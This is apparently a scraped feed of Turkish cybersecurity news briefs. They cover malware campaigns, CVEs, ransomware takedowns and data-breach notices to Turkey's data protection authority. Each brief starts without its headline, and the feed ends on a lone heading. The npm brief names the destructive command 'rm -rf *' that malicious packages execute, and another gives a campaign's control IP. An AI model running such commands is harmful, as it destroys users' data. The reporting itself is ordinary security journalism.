ACE, bugüne kadar Openload, Streamango, Beast IPTV, 123movies.la ve anime platformu Zoro.to gibi çok sayıda korsan servisi kapattı. Geçtiğimiz yıl Jetflicks davasında beş kişiye ceza verilmesine, 22 milyon kullanıcılı ve aylık 250 milyon euro gelir elde eden bir korsan ağının çökertilmesine ve 821 milyon yıllık ziyaretçiye sahip Markkystreams’in kapatılmasına da katkı sağladı.

Uyarı niteliğinde mesaj
ACE’nin bağlı olduğu Sinema Filmleri Derneği (MPA) Başkan Yardımcısı Larissa Knapp, “Bu yaptırım korsan yayıncılara ciddi bir uyarıdır. Yasadışı yayın hizmeti işletmek, davalar, ağır mali cezalar ve kalıcı kapatmalarla sonuçlanır” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kara para aklama itirafı
Rodriguez ve Hill, Samourai Wallet üzerinden kara para aklama faaliyetlerine bilerek aracılık ettiklerini kabul etti. İkilinin, suç gelirlerinin gizlenmesini sağlamak için “Whirlpool” ve “Ricochet” adlı hizmetleri sunduğu ortaya çıktı.

80 bin Bitcoin işlendi
Mahkeme belgelerine göre, 2015–2024 yılları arasında hizmet aracılığıyla 80 binden fazla Bitcoin (2 milyar doların üzerinde) yasa dışı kaynaktan geçirilerek karıştırıldı. Bu işlemlerden yaklaşık 6 milyon dolar hizmet ücreti elde edildi.

Tutuklamalar ve kapatma
Kurucular Nisan 2024’te tutuklandı. Aynı gün İzlanda polisi Samourai’nin internet alan adlarını ve sunucularını ele geçirdi, Google ise uygulamayı Play Store’dan kaldırdı. Uygulama, kapanmadan önce 100 binden fazla kez indirilmişti.

Suçun bilincindeydiler
Savcıların aktardığına göre, Rodriguez WhatsApp yazışmalarında “karıştırmayı bitcoin için kara para aklama” olarak tanımladı. Hill ise karanlık ağ forumlarında Samourai’yi “kirli BTC temizleme aracı” olarak tanıttı.

Mahkeme süreci ve ceza ihtimali
İkili, suçunu kabul ederek kara para aklama operasyonunu yürüttüğünü kabul etti. Anlaşma kapsamında 237,8 milyon dolar tutarında varlığı devlete bırakacaklar. Rodriguez ve Hill, para aklama suçlamasında 20 yıla kadar, izinsiz para transferi suçlamasında ise 5 yıla kadar hapisle yargılanıyordu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sahte cüzdan uzantıları mağazaya sızdı
Koi Security’nin bulgularına göre saldırganlar, sahte kripto cüzdanı uzantılarını ilk etapta zararsız görünecek şekilde mağazaya yükledi. Onay aldıktan sonra ise marka ve logoları değiştirip zararlı kod enjekte ettiler.

Kullanıcı bilgileri keylogger ile çalındı
Uzantılara entegre edilen kod, kullanıcıların cüzdan giriş bilgilerini eklenti pencerelerindeki form alanlarından kaydederek saldırganların kontrolündeki uzak sunuculara gönderdi. Ayrıca kurbanların IP adresleri de izlendi.

Sahte sitelerle desteklendi
Kampanyaya paralel olarak, Trezor ve Jupiter Wallet gibi bilinen cüzdan sağlayıcılarını taklit eden çok sayıda sahte web sitesi açıldı. Bu siteler, LummaStealer gibi bilgi hırsızları ve fidye yazılımları dahil 500’den fazla zararlı yazılımın dağıtımını yaptı. Tüm operasyon, 185.208.156.66 IP adresi üzerinden yönetildi.

AI desteğiyle ölçeklendirildi
Araştırmaya göre kampanyada kullanılan kodlarda yapay zekâ izleri görüldü. Bu sayede saldırganların farklı yükler geliştirmesi, tespitten kaçınması ve saldırıları hızla büyütmesi kolaylaştı.

Mozilla eklentileri kaldırdı
Mozilla, şikâyetlerin ardından uzantıları mağazadan kaldırdı. Ancak kampanyanın büyüklüğü, daha önce Haziran 2025’te devreye alınan koruma sistemine rağmen sahte cüzdan uzantılarının hâlâ mağazaya sızabildiğini gösteriyor.

Chrome mağazasına da sıçrayabilir
Koi Security, GreedyBear grubunun Chrome Web Store’a da geçmeyi planladığını ve şimdiden “Filecoin Wallet” adlı sahte bir Chrome uzantısının tespit edildiğini bildirdi.

Kullanıcılar için öneriler
Uzmanlar, eklenti kurmadan önce yayıncı bilgilerini ve kullanıcı yorumlarını kontrol etmeyi, resmi cüzdan projelerinin yalnızca kendi sitelerinden yönlendirdiği bağlantılarla indirilmesini tavsiye ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sıfır gün iddiası reddedildi
Geçtiğimiz hafta Arctic Wolf Labs, SonicWall Gen 7 cihazlarını hedef alan saldırıların sıfır gün açığa işaret edebileceğini duyurmuştu. Ancak SonicWall, yaptığı incelemeler sonucunda saldırıların CVE-2024-40766 adlı bilinen bir zafiyet üzerinden gerçekleştiğini bildirdi.

CVE-2024-40766 nedir
Bu açık, SonicOS yazılımındaki SSLVPN erişim kontrol zafiyeti nedeniyle yetkisiz kişilerin VPN oturumlarını ele geçirmesine imkân tanıyor. Açık, Ağustos 2024’te yayımlanan SNWLID-2024-0015 danışma belgesiyle duyurulmuştu.

Migrasyon hataları istismar edildi
SonicWall, 40 farklı olayın incelenmesi sonucunda pek çok vakada Gen 6’dan Gen 7’ye geçişte yerel kullanıcı parolalarının sıfırlanmadığını ve bunun saldırganların sisteme erişimini kolaylaştırdığını belirtti. Oysa parolaların sıfırlanması, orijinal güvenlik tavsiyelerinde kritik bir adım olarak açıklanmıştı.

Yeni önerilen adımlar
Şirket, kullanıcıların cihaz yazılımını 7.3.0 veya daha yeni sürümlere yükseltmesini, SSLVPN için kullanılan tüm yerel hesap parolalarının derhal sıfırlanmasını ve mümkünse erişimin yalnızca güvenilir IP’lerle sınırlandırılmasını tavsiye ediyor.

Kullanıcıların şüpheleri sürüyor
Buna rağmen bazı kullanıcılar, Reddit’te yaptıkları yorumlarda SonicWall’ın açıklamalarının kendi deneyimleriyle örtüşmediğini, hatta bazı log dosyalarının incelenmediğini iddia etti. Bu nedenle uzmanlar, resmi açıklamaların ötesinde yüksek düzeyde dikkat ve hızlı önlem alınması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı 4 Ağustos’ta gerçekleşti
Bouygues Telecom, 4 Ağustos 2025 Pazar günü bir siber saldırıya uğradığını ve yetkisiz erişim sonucu 6,4 milyon müşteriye ait kişisel verilerin ele geçirildiğini doğruladı. Şirketin teknik ekipleri saldırıya hızlı şekilde müdahale ettiklerini ve ek güvenlik önlemlerinin alındığını açıkladı.

Etkilenen müşteri bilgileri
Yapılan açıklamaya göre saldırıda ele geçirilen veriler arasında müşterilerin iletişim bilgileri, sözleşme detayları, medeni durum verileri, kurumsal müşterilere ait şirket bilgileri ve IBAN numaraları bulunuyor. Şirket, kredi kartı bilgilerinin ve müşteri hesap şifrelerinin bu ihlalden etkilenmediğini vurguladı.

Yetkililer bilgilendirildi
Bouygues Telecom, saldırının bilinen bir siber suç grubu tarafından şirket içi kaynaklar hedef alınarak gerçekleştirildiğini belirtti. Konuyla ilgili olarak Fransa Ulusal Siber Güvenlik Ajansı (ANSSI) ve Kişisel Verileri Koruma Kurumu (CNIL) bilgilendirildi. Saldırıyı düzenleyenler için 5 yıla kadar hapis ve 150 bin euroya kadar para cezası öngörülüyor.

Müşterilere dolandırıcılık uyarısı
Şirket, müşterilerini SMS ve e-posta yoluyla bilgilendirmeye başladı. Açıklamada, kimlik avı ve sahte aramalara karşı dikkatli olunması gerektiği, hesap bilgilerini isteyen kişilere güvenilmemesi gerektiği uyarısı yapıldı. Ayrıca, IBAN bilgilerinin tek başına işlem için yeterli olmamasına rağmen müşterilerin hesap hareketlerini yakından takip etmeleri tavsiye edildi.

Fransız telekom sektöründe artan tehdit
Bouygues Telecom’daki ihlal, sadece bir hafta önce Orange’ın yaşadığı ağ saldırısının ardından geldi. Avrupa’daki bu gelişmeler, ABD merkezli telekom şirketlerini hedef alan ve Çin bağlantılı Salt Typhoon grubuna atfedilen saldırılarla benzerlik gösteriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yeni EDR öldürücü aracı
Sophos’un raporuna göre, fidye yazılım grupları tarafından kullanılan yeni EDR öldürücü aracı, güvenlik çözümlerini devre dışı bırakarak saldırganların ağlarda fark edilmeden hareket etmesine olanak sağlıyor. Araç, RansomHub, Blacksuit, Medusa, Qilin, Dragonforce, Crytox, Lynx ve INC grupları tarafından kullanıldı.

BYOVD yöntemiyle kernel ayrıcalıkları
Araç, zararlı bir sürücüyü (çoğu zaman çalıntı ya da süresi dolmuş dijital sertifikayla imzalanmış) yükleyerek “Bring Your Own Vulnerable Driver” (BYOVD) saldırısı gerçekleştiriyor. Böylece çekirdek seviyesinde ayrıcalık kazanarak güvenlik yazılımlarını kapatıyor.

Hedef alınan güvenlik çözümleri
Saldırının hedefinde Sophos, Microsoft Defender, Kaspersky, Symantec, Trend Micro, SentinelOne, Cylance, McAfee, F-Secure, HitmanPro ve Webroot gibi çok sayıda EDR ve antivirüs ürünü yer alıyor.

Paylaşılan bir geliştirme altyapısı
Sophos, aracın tek bir sızıntı sonucu yayılmadığını, farklı fidye yazılım gruplarının aynı çerçeve üzerinden kendi sürümlerini oluşturduğunu belirtiyor. Tüm varyantlarda HeartCrypt paketleyicisinin kullanıldığı ve bilgi/araç paylaşımının yoğun olduğu ifade edildi.

Benzer araçlar daha önce de kullanıldı
EDRKillShifter dışında, AuKill ve AvNeutralizer gibi araçlar da farklı gruplar tarafından güvenlik yazılımlarını etkisiz hale getirmek için kullanılmıştı. Bu yöntem, fidye yazılım ekosisteminde giderek yaygınlaşıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tespit edilmesi zor
Microsoft’un açıklamasına göre, saldırılar yerel Exchange sunucularından geldiğinde Microsoft Purview gibi bulut tabanlı loglama araçları bu etkinlikleri kaydetmeyebiliyor. Bu durum saldırıların fark edilmesini güçleştiriyor.

Araştırmacı Black Hat’te gösterdi
Outsider Security’den araştırmacı Dirk-Jan Mollema, Black Hat konferansında açığı göstererek Microsoft’a üç hafta önce rapor ettiğini açıkladı. Microsoft, konferansla eş zamanlı olarak güvenlik duyurusu ve gerekli yamaları yayımladı.

Federal kurumlara zorunlu adımlar
CISA’nın 25-02 sayılı acil direktifine göre kurumlar:

• Microsoft Health Checker script ile Exchange ortamlarını tarayacak,

• Destek dışı sunucuları ağdan ayıracak,

• Güncel kümülatif yamaları (Exchange 2019 için CU14/15, 2016 için CU23) yükleyecek,

• Nisan 2025 hotfix’ini uygulayacak,

• Ardından ConfigureExchangeHybridApplication.ps1 scripti ile paylaşımlı servis hesabından özel hibrit uygulamaya geçiş yapacak.

Kurumların teknik düzeltmeleri Pazartesi sabahına kadar tamamlaması ve aynı gün 17.00’ye kadar CISA’ya rapor sunması gerekiyor.

Tüm kuruluşlara uyarı
CISA, zorunluluk yalnızca federal kurumlar için geçerli olsa da, açığın tüm sektörlerde risk oluşturduğunu belirterek özel kuruluşları da güncelleme yapmaya çağırdı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

NPM’de sahte WhatsApp kütüphaneleri
Siber güvenlik şirketi Socket, NPM platformunda WhatsApp geliştirme araçları kılığına giren iki zararlı paketi tespit etti. “naya-flore” ve “nvlore-hsc” isimli paketler, WhatsApp botları ve otomasyon araçları geliştirenleri hedef alıyor.

Dosya silme komutu çalıştırıyor
Her iki pakette de “requestPairingCode” adlı fonksiyon, WhatsApp eşleştirme işlemi gibi görünse de aslında bir GitHub adresinden gelen verileri işliyor. Belirli telefon numaralarına sahip kullanıcılar hariç, hedef alınan geliştiricilerin sisteminde “rm -rf *” komutu çalıştırılıyor ve bulunduğu dizindeki tüm dosyalar siliniyor.

Veri sızdırma fonksiyonu da var
Paketlerde ayrıca “generateCreeds” adlı, telefon numarası, cihaz kimliği ve anahtar bilgilerini çalabilecek bir fonksiyonun da bulunduğu tespit edildi. Bu fonksiyon şu an yorum satırına alınmış durumda ancak ileride aktif hale getirilebileceği uyarısı yapıldı.

Go geliştiricileri de risk altında
Socket, aynı zamanda Go ekosisteminde 11 zararlı paket keşfetti. Bu paketler, sahte isimlerle yüklenip çalıştırıldığında uzaktan yüklenen zararlı komut dosyalarını çalıştırıyor. Çoğu, yazım hatalarına dayalı “typosquatting” yöntemiyle geliştiricileri yanıltmayı hedefliyor.

Geliştiricilere uyarı
Araştırmacılar, hem NPM hem de Go geliştiricilerinin kullandıkları kütüphaneleri dikkatle doğrulamaları gerektiğini vurguladı. Birçok paket hâlâ aktif durumda bulunuyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Çete 2022’den bu yana aktifti
ABD İç Güvenlik Soruşturmaları (HSI), Royal ve BlackSuit olarak bilinen siber suç grubunun altyapısının uluslararası iş birliğiyle geçen ay çökertildiğini duyurdu. Grubun 2022’den bu yana 450’den fazla ABD şirketini hedef aldığı belirlendi.

Çifte şantaj yöntemiyle milyonlarca dolar
Açıklamaya göre saldırganlar, sistemleri şifreleyerek kullanılamaz hale getiriyor, ardından çalınan verileri sızdırma tehdidiyle ödeme talep ediyordu. Bu yöntemle elde edilen fidye miktarı 370 milyon doların üzerine çıktı.

Conti’den Royal’a, oradan BlackSuit’a
Grup ilk kez 2022 başında Quantum fidye yazılımıyla ortaya çıktı ve Conti çetesinin halefi olarak değerlendirildi. Aynı yıl Royal markasıyla yeniden ortaya çıkan grup, 2023’te Dallas şehrini hedef aldıktan sonra BlackSuit adını benimsedi.

Uluslararası operasyonla çökertildi
ABD Adalet Bakanlığı, 24 Temmuz 2025’te yaptığı açıklamada BlackSuit’in karanlık ağ sitelerinin ele geçirildiğini ve yerine “seizure banner” uyarılarının yerleştirildiğini duyurdu. Operasyonun kod adı “Checkmate” olarak açıklandı.

Yeni kimlikle geri dönüş ihtimali
Cisco Talos araştırmacıları, BlackSuit’in yeniden yapılanarak Chaos adıyla faaliyet göstermeye başladığına dair bulgular tespit etti. Yeni yapı, fidye yazılım hizmeti (RaaS) modeliyle çalışıyor ve hem yerel hem uzak depolamayı hedef alan saldırılarda çifte şantaj yöntemi kullanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı Mayıs’ta gerçekleşti
Columbia Üniversitesi, 16 Mayıs 2025 civarında yetkisiz erişim yoluyla ağ sistemlerine girildiğini ve belirli dosyaların dışarıya çıkarıldığını duyurdu. Olay, 24 Haziran’da sistemlerde yaşanan kesinti sonrası başlatılan inceleme sırasında ortaya çıktı.

870 bine yakın kişi etkilendi
Üniversitenin Maine Başsavcılığı’na sunduğu belgelerde, 868 bin 969 kişinin ihlalden etkilendiği belirtildi. Bu kişiler arasında mevcut ve eski öğrenciler, başvuru sahipleri, çalışanlar ve bazı aile üyeleri bulunuyor.

Çalınan verilerin kapsamı geniş
Bildirim mektuplarına göre, etkilenen veriler arasında ad, doğum tarihi, Sosyal Güvenlik numarası, iletişim bilgileri, demografik veriler, akademik kayıtlar, mali yardım bilgileri ve sağlık ile sigorta verileri yer alıyor. Üniversite, Columbia University Irving Medical Center hasta kayıtlarının etkilenmediğini duyurdu.

Ücretsiz kimlik koruma desteği
Columbia Üniversitesi, çalınan verilerin henüz dolandırıcılıkta kullanılmadığına dair bir bulgu olmadığını açıklasa da, mağdurlara iki yıl boyunca Kroll üzerinden ücretsiz kredi izleme, dolandırıcılık danışmanlığı ve kimlik hırsızlığına karşı destek hizmetleri sunulacağını bildirdi.

Hacker 460 GB veri çaldığını iddia etti
Üniversite, geçtiğimiz hafta yaptığı ilk açıklamada, saldırganın yaklaşık 460 gigabayt veriyi ele geçirdiği yönündeki iddiaları doğrulamıştı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

FPRPC devre dışı bırakılıyor
Microsoft, 365 uygulamalarının 2508 sürümüyle birlikte FPRPC üzerinden dosya erişiminin varsayılan olarak engelleneceğini açıkladı. Engelleme Ağustos sonunda başlayacak, tüm kullanıcılara Eylül 2025 sonuna kadar ulaşacak.

FTP ve HTTP için yeni ayarlar
Yeni Trust Center ayarlarıyla kullanıcılar, yöneticiler izin verdiği sürece FPRPC’yi yeniden etkinleştirebilecek. Ayrıca FTP ve HTTP üzerinden dosya açma işlemleri hâlen varsayılan olarak açık olsa da, kullanıcıların bu protokolleri kapatma seçeneği olacak.

Yöneticiler için CPS kontrolü
Yöneticiler, Cloud Policy Service (CPS) üzerinden kimlik doğrulama protokollerini yönetebilecek. Eğer bir protokol CPS üzerinden devre dışı bırakılırsa, kullanıcılar Trust Center ayarlarıyla yeniden aktif hale getiremeyecek.

Microsoft güvenlik önlemlerini artırıyor
Şirket, son dönemde güvenlik açıklarını azaltmak için art arda önlemler aldı. Ocak 2025’ten itibaren ActiveX kontrolleri Microsoft 365 ve Office 2024’te devre dışı bırakıldı. Temmuz ayında Teams toplantılarında ekran görüntüsü engelleme özelliği devreye alındı. Outlook’ta ise .library-ms ve .search-ms dosya türleri engellenen ekler listesine eklendi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Politico’nun iddiaları sonrası açıklama geldi
Politico’nun hafta başında yayımladığı haberde, saldırının bazı federal bölgelerde gizli bilgileri ortaya çıkardığı, hatta gizli tanıkların kimliklerini açığa çıkarmış olabileceği öne sürülmüştü. Kurumun yaptığı açıklama bu iddiaları doğrudan teyit etmese de, davacıları etkileyecek verilerin zarar görmüş olabileceğini ima ediyor.

4 Temmuz’da fark edildi
İsimsiz kaynaklara göre, saldırının boyutu 4 Temmuz 2025’te tam olarak anlaşıldı ve ardından kurum içinde gizli bir bilgilendirme yapıldı. Ancak kamuoyuna ilk resmi açıklama ancak Politico’nun haberinden sonra geldi.

Güvenlik önlemleri artırılıyor
Yargı yetkilileri, sistemin güvenliğinin artırıldığını, saldırıları engellemek için yeni önlemler alındığını ve mahkemelerle iş birliği yapılarak davacılar üzerindeki etkinin en aza indirilmeye çalışıldığını duyurdu.

Kamu ve özel sektörde artan tehdit
Federal Yargı, hem kamu hem de özel kurumlara yönelik siber saldırıların artan hacim ve karmaşıklığına dikkat çekerek, eski sistemlerin korunmasının giderek zorlaştığını vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kayıplar 2024’te rekor kırdı
FTC’nin Tüketici Koruma Veri Raporu’na göre 2024 yılında 60 yaş üstü bireyler toplamda 700 milyon dolarını dolandırıcılara kaptırdı. Bu miktar, 2020’deki 121 milyon dolarlık kaybın altı katına, 2023’teki 542 milyon dolarlık kaybın ise yüzde 30 üzerine çıktı.

En büyük kayıp 100 bin dolar üstünde
Rapor, 2024’te 100 bin doların üzerinde kayıp yaşayanların toplam 445 milyon dolar kaybettiğini ortaya koydu. 10 ila 100 bin dolar arası kayıplar 214 milyon dolar, 10 bin dolar altındaki kayıplar ise 41 milyon dolar olarak kaydedildi.

Dolandırıcıların en sık kullandığı yöntemler
Dolandırıcılık yöntemleri arasında resmi kurum ya da şirket kılığına girme, sahte kriz senaryoları ve telefonla baskı en öne çıkanlar oldu. Dolandırıcılar, bankalarda şüpheli işlem, sosyal güvenlik numarasıyla işlenen suç veya bilgisayar korsanlığı iddialarıyla mağdurları kandırdı.

FTC adına sahte aramalar yapıldı
FTC’nin açıklamasına göre bazı dolandırıcılar, ironiyle kurumun adını kullanarak sahte personel kimliğiyle insanları kandırdı. Mağdurlara, paralarını Bitcoin ATM’lerine yatırmaları, nakit veya altın teslim etmeleri gibi asılsız yönlendirmeler yapıldı.

Yaşlılar neden hedef alınıyor
Rapora göre yaşlı yetişkinler, daha büyük finansal birikimlere sahip olmaları, otoritelere duydukları güven ve teknolojiyi daha az bilme sebebiyle hedef oluyor. Birçok kişinin hayat birikimlerini ve emeklilik hesaplarını kaybettiği bildirildi.

Genel dolandırıcılık kaybı 12,5 milyar dolar
FTC, 2024 yılında Amerikalıların toplam dolandırıcılık kaybının 12,5 milyar dolara ulaştığını ve bunun 2023’e göre yüzde 25 artış anlamına geldiğini duyurdu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dizin geçişi açığı tespit edildi
ESET araştırmacıları Anton Cherepanov, Peter Košinár ve Peter Strýček tarafından keşfedilen CVE-2025-8088 açığı, WinRAR’ın önceki sürümlerinde dosya çıkartma sırasında saldırgan tarafından belirlenen bir yola yönlendirme yapılmasına imkân veriyor.

Windows başlangıç klasörüne kötü amaçlı dosya
Bu yöntemle saldırganlar, zararlı yürütülebilir dosyaları Windows Başlangıç klasörlerine yerleştirebiliyor. Kullanıcı oturum açtığında dosya otomatik çalışıyor ve uzaktan kod yürütme sağlanıyor.

Phishing kampanyalarında kullanıldı
ESET, RomCom grubunun hedefli kimlik avı e-postaları aracılığıyla gönderilen RAR eklerinde bu açığı kullandığını belirledi. Bu saldırılarla kurban sistemlere RomCom arka kapıları yüklendi.

RomCom’un geçmiş faaliyetleri
Rusya bağlantılı RomCom grubu (Storm-0978, Tropical Scorpius veya UNC2596 olarak da biliniyor), daha önce Cuba ve Industrial Spy fidye yazılımlarıyla ilişkilendirilmişti. Grup, kimlik bilgisi hırsızlığı ve veri gaspı odaklı saldırılarda sıfır gün açıklarını sıkça kullanıyor.

Kullanıcılara güncelleme uyarısı
Uzmanlar, WinRAR’ın otomatik güncelleme özelliği bulunmadığı için tüm kullanıcıların 7.13 sürümünü manuel olarak indirip yüklemesi gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Beş güvenlik açığı tespit edildi
Cisco’nun Talos güvenlik ekibi, Dell’in ControlVault3 firmware ve Windows API’lerinde beş kritik açık keşfetti. CVE-2025-24311, CVE-2025-25050, CVE-2025-25215, CVE-2025-24922 ve CVE-2025-24919 kodlarıyla tanımlanan açıklar bellek taşmalarından güvensiz serileştirmeye kadar farklı güvenlik kusurlarını içeriyor.

Oturum açma atlatılabiliyor
Araştırmaya göre saldırganlar bu açıkları zincirleyerek firmware üzerinde keyfi kod çalıştırabiliyor. Bu sayede Windows oturum açma işlemini atlatmak, kullanıcı ayrıcalıklarını yönetici seviyesine çıkarmak ve kalıcı kötü amaçlı yazılımlar yerleştirmek mümkün hale geliyor.

Fiziksel erişim riski
Cisco Talos, fiziksel erişimi bulunan bir saldırganın cihazı açarak USB üzerinden Unified Security Hub (USH) kartına bağlanabileceğini, böylece parmak izi doğrulamasını manipüle ederek cihazın herhangi bir parmak izini kabul etmesini sağlayabileceğini bildirdi.

Dell güncelleme yayımladı
Dell, Mart-Mayıs 2025 arasında ControlVault3 sürücü ve firmware güncellemeleri yayımladı. Şirket, etkilenen modellerin tam listesini güvenlik duyurusunda paylaştı.

Önerilen önlemler
Araştırmacılar, cihazların güncel tutulması, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik bileşenlerinin devre dışı bırakılması gerektiğini vurguladı. Ayrıca BIOS üzerinden kasa açılma uyarısının etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği (ESS) özelliğinin kullanılmasının fiziksel saldırılara karşı ek koruma sağlayacağı belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hesap ele geçirilerek müşteri verilerine ulaşıldı
Richemont İstanbul Lüks Eşya Dağıtım A.Ş., veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre ihlal, Richemont Group bünyesinde görev yapan bir çalışanın hesabının yetkisiz kişilerce ele geçirilmesiyle gerçekleşti.

İhlal dört ay sonra fark edildi
Saldırının 17-18 Ocak 2025 tarihlerinde gerçekleştiği, ancak 30 Mayıs 2025 tarihinde tespit edilebildiği aktarıldı.

25 bini aşkın müşteri etkilendi
Olaydan 25 bin 737 müşteri ve potansiyel müşterinin etkilendiği bildirildi. Ele geçirilen veriler arasında isim, e-posta adresi, ülke bilgisi, müşteri kimliği ve doğum tarihi yer aldı.

KVKK kamuoyuna duyurma kararı aldı
Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/1006 sayılı kararıyla veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin incelemeler devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yetkisiz erişim iki gün sürdü
İstanbul Gedik Üniversitesi, yaşanan veri ihlaline ilişkin Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, 13-14 Mayıs 2025 tarihleri arasında üniversite adına veri işleyen şirketin sistemlerine yetkisiz erişim sağlandı ve durum 14 Mayıs’ta tespit edildi.

23 bin kişi, 209 bin kayıt etkilendi
Veri ihlalinden çalışanlar, kullanıcılar ve öğrencilerin yer aldığı 23 bin 269 kişinin etkilendiği, toplamda 209 bin 421 kayıtta kişisel verilerin risk altında olduğu belirtildi.

Hangi veriler sızdırıldı
İhlalden etkilenen veriler arasında ad, soyad, kullanıcı adı, maskelenmiş T.C. kimlik numarası (yalnızca son dört hanesi görünür şekilde), e-posta adresi, kurum-departman bilgileri ve kullanıcı trafik verileri bulunduğu aktarıldı.

KVKK kararıyla kamuoyuna duyuruldu
Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/997 sayılı kararıyla veri ihlalinin kamuoyuna duyurulmasına karar verdi. Konuyla ilgili incelemeler devam ediyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yetkisiz erişim üçüncü taraf üzerinden gerçekleşti
Louis Vuitton Çantacılık Ticaret A.Ş., müşterilere ait veritabanına yönelik yetkisiz erişim hakkında Kişisel Verileri Koruma Kurumu’na bildirimde bulundu. Açıklamaya göre, ihlal üçüncü taraf bir hizmet sağlayıcının yöneticisi tarafından kullanılan servis hesabının ele geçirilmesiyle başladı.

İhlal bir ay sürdü
7 Haziran 2025’te başlayan saldırı, 2 Temmuz 2025’te tespit edildi. Yetkisiz erişim süresince müşterilere ait kimlik ve iletişim bilgilerinin risk altına girdiği ifade edildi.

142 bin kişi etkilendi
Türkiye’de 142 bin 995 müşteri ve potansiyel müşterinin verilerinin etkilendiği bildirildi. İncelemeler sürerken, etkilenen veri kategorilerinin kimlik ve iletişim bilgileri olduğu aktarıldı.

KVKK’dan kamuoyuna duyuru kararı
Kişisel Verileri Koruma Kurulu, 10 Temmuz 2025 tarihli ve 2025/1246 sayılı kararıyla veri ihlalinin kurumun internet sitesinde yayımlanmasına karar verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dosyalar yasa dışı paylaşım sitelerine yüklendi
BeiGene, Ltd. tarafından yapılan bildirimde, 16 Haziran 2025 tarihinde sınırlı sayıda kurumsal dosyanın pastebin.com ve swisstransfer.com platformlarına yüklendiği tespit edildi.

Klinik çalışmalara ait veriler sızdırıldı
Sızdırılan belgelerin, şirketin yürüttüğü klinik çalışmaların planlanması ve takibi için kullanılan verileri içerdiği belirtildi.

467 kişi etkilendi
Veri ihlalinden Türkiye’de 17 çalışan ve 450 hasta olmak üzere toplam 467 kişinin etkilendiği bildirildi. Etkilenen kişisel veri kategorilerinin kimlik, iletişim ve sağlık bilgileri olduğu aktarıldı.

KVKK kamuoyuna duyurma kararı aldı
Kişisel Verileri Koruma Kurulu, 24 Haziran 2025 tarihli ve 2025/1130 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Olayla ilgili incelemelerin sürdüğü belirtildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Güvenlik açığı 2023’ten bu yana mevcuttu
Bold LLC tarafından yapılan açıklamaya göre, kullanıcıların özgeçmişlerini düzenlerken gerçek zamanlı ön izleme imkânı sunan yeni bir özelliğin yetkisiz erişime açık olduğu 12 Temmuz 2025’te tespit edildi. İncelemeler, söz konusu açığın ilk olarak 10 Mart 2023 tarihinde ortaya çıktığını ortaya koydu.

Bir kez yetkisiz erişim gerçekleşti
Şirketin bildiriminde, sunucu ortamının daha hızlı performans için anonimleştirilmiş verileri önbelleğe almak üzere erişilebilir hale getirildiği, bu durum nedeniyle yalnızca bir kez yetkisiz erişimin yaşandığı ifade edildi.

Anonimleştirilmiş özgeçmiş verileri etkilendi
İhlalden etkilenen veriler arasında isim, iletişim bilgileri ve özgeçmiş içerikleri yer aldı. Verilerin kapsamı kullanıcı tercihine bağlı olarak değişiklik gösterirken, bazı özgeçmişlerde sadece ad ve soyad bilgileri bulunduğu, bazılarında ise eğitim, istihdam geçmişi, iletişim bilgileri, fotoğraflar ve gönüllü olarak paylaşılan diğer bilgilerin yer aldığı bildirildi.

3 bini aşkın kullanıcı etkilendi
Bold LLC, ihlalden etkilenen ilgili kişi gruplarının kullanıcılar ve aboneler olduğunu, toplam 3168 kişinin verilerinin etkilendiğini açıkladı.

KVKK duyuru kararı aldı
Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1356 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. İncelemelerin sürdüğü aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı aynı gün tespit edildi
Yatırım Finansman Menkul Değerler A.Ş., 20 Temmuz 2025’te yaşanan fidye yazılımı saldırısını Kişisel Verileri Koruma Kurumu’na bildirdi. Açıklamaya göre saldırı aynı gün tespit edildi.

Uluslararası bir saldırı grubu hedef aldı
Şirketin bildiriminde, sunucular ve istemci bilgisayarların uluslararası ve uzman bir saldırı grubu tarafından hedef alındığı belirtildi.

Kişisel veriler üzerindeki etki araştırılıyor
Saldırının ardından etkilenen kişi sayısı, ilgili kişi grupları ve kişisel veri kategorilerinin henüz belirlenemediği ifade edildi. Teknik incelemelerin devam ettiği aktarıldı.

Vatandaşlar için başvuru kanalları
Şirket, saldırıyla ilgili bilgi almak isteyen kişilerin tüm şubelerden ve 0 850 723 59 59 numaralı Yatırımcı Destek Hattı üzerinden destek alabileceğini duyurdu.

KVKK’dan duyuru kararı
Kişisel Verileri Koruma Kurulu, 24 Temmuz 2025 tarihli ve 2025/1359 sayılı kararıyla ihlalin Kurumun internet sitesinde ilan edilmesine karar verdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yasadışı platformlarda satışa çıkarıldı
